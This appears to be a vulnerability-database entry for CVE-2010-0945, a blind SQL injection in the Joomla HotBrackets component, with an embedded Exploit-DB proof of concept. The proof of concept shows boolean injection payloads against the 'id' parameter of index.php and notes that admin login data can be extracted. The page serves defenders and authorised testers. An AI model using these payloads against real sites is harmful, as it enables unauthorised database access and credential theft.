CVE-2010-0945

high
Published 2010-03-08 ยท Modified 2026-04-29
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
8.5

Description

SQL injection vulnerability in the HotBrackets Tournament Brackets (com_hotbrackets) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-10953 webapps php text ยท 1 KB
FL0RiX ยท 2010-01-03

Joomla! Component com_hotbrackets - Blind SQL Injection

text exploit Source: Exploit-DB
<------------------- header data start ------------------- >

#############################################################
#       Joomla Component com_hotbrackets Blind SQL injection Vulnerability
#############################################################

# author        : Fl0riX

# Name           : com_hotbrackets

# Bug Type       : Blind SQL Injection

# Infection      : Admin login bilgileri al&#305;nabilir.

# Demo Vuln.     :
TRUE(+)
ยป http://server/index.php?option=com_hotbrackets&id=1 and 1=1
FALSE(-)
ยป http://server/index.php?option=com_hotbrackets&id=1 and 1=0

# Bug Fix Advice : Zararl&#305; karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_hotbrackets&id=[Blind]

< -- bug code end of -- >

Application impact

VendorProductVersionsFixed
hotbracketscom_hotbrackets
joomla joomlajoomla\!

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.